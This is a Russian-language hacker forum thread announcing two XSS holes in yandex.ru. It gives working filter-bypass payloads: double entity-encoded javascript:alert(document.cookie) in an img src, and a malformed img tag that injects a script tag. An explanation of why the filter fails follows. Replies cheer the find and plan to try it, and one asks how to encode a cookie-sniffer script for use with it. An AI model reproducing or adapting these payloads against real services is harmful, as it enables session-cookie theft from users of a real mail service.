XSS в yandex.ru

Вот на yandex нашёл 2 xss.

1.

Code:

<img src="&#38&#35&#49&#48&#54&#38&#35&#57&#55&#38&#35&#49&#49&#56&#38&#35&#57&#55&#38&#35&#49&#49&#53&#38&#35&#57&#57&#38&#35&#49&#49&#52&#38&#35&#49&#48&#53&#38&#35&#49&#49&#50&#38&#35&#49&#49&#54&#38&#35&#53&#56&#38&#35&#57&#55&#38&#35&#49&#48&#56&#38&#35&#49&#48&#49&#38&#35&#49&#49&#52&#38&#35&#49&#49&#54&#38&#35&#52&#48&#38&#35&#49&#48&#48&#38&#35&#49&#49&#49&#38&#35&#57&#57&#38&#35&#49&#49&#55&#38&#35&#49&#48&#57&#38&#35&#49&#48&#49&#38&#35&#49&#49&#48&#38&#35&#49&#49&#54&#38&#35&#52&#54&#38&#35&#57&#57&#38&#35&#49&#49&#49&#38&#35&#49&#49&#49&#38&#35&#49&#48&#55&#38&#35&#49&#48&#53&#38&#35&#49&#48&#49&#38&#35&#52&#49">

суть в том, что javascript:alert(document.cookie) кодируется к виду &#..., а потом получившаяся строчка ещё раз кодируется по такому же принципу. Фильтр один раз декодирует src и получится такое:

Code:

<img src="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#100&#111&#99&#117&#109&#101&#110&#116&#46&#99&#111&#111&#107&#105&#101&#41">
это "javascript..." закодированое 1 раз

а это браузер прекрасно поймёт

2.

Code:

<img src=a"&#62&#60a&#32id&#61xxx&#62&#60&#47a&#62&#60script&#62[COLOR=Blue]&#97&#108&#101&#114&#116&#40&#100&#111&#99&#117&#109&#101&#110&#116&#46&#99&#111&#111&#107&#105&#101&#41&#59[/COLOR]&#60&#47script&#62&#60&#97&#32&#115&#114&#99&#61&#34>

синим цветом - alert(document.cookie);
Ошибка фильтра опять в том, что неправильно понимает содержимое src и ещё хуже декодирует строки типа &#...

 

круто!
маладца!

 

Да... я всегда говорил, что тупые методы защиты от Xss бесполезны....)))

 

LittleLamer что то ник не соответствует действительности! Респект за идею,будем пробовать!

 

Я не понимаю разве трудно профильтровать все с htmlspecilachars? ЗАЧЕМ КАКИЕ-ТО ФИЛЬТРЫ? Или я ошибаюсь?

 

ты ошибаешься - фича многих почтовых сервантов с веб интерфейсом в том что они позволяют юзать "приемлимые" теги типа <a>,<img> и тд Поэтому основная задача фильтра допустить использование только тегов из списка причем ключевые слова типа javascript,background и тд должны вырезаться или заменяться как в хакере на ЯваСкрИптъ (или что-то типа того) но бага все равно есть=)) Имхо для обеспечения полной безопасности достаточно дать пользователям использовать все теги только по определённому шаблону... например <aПРОБЕЛhref=УРЛ>ТЕКСТ</a> причем УРЛ и ТЕКСТ не должны содержать опасных символов типа ",<,>,'.

 

Мне срочно нужно узнать как закодировать скрипт сниффера!!!

 

Берёшь да кодируешь много программ есть для этого!

 

А например?

 

Вот скажите мне, накой поднимать старую тему чтоб тока сморознуть какую-то фигню?
Одно дело бы по сабжу хотяб, а то......Неужели "Болталка" для ОФФТОПА уже не годится???????????????????????

ЗАКРЫТО!
/ме злой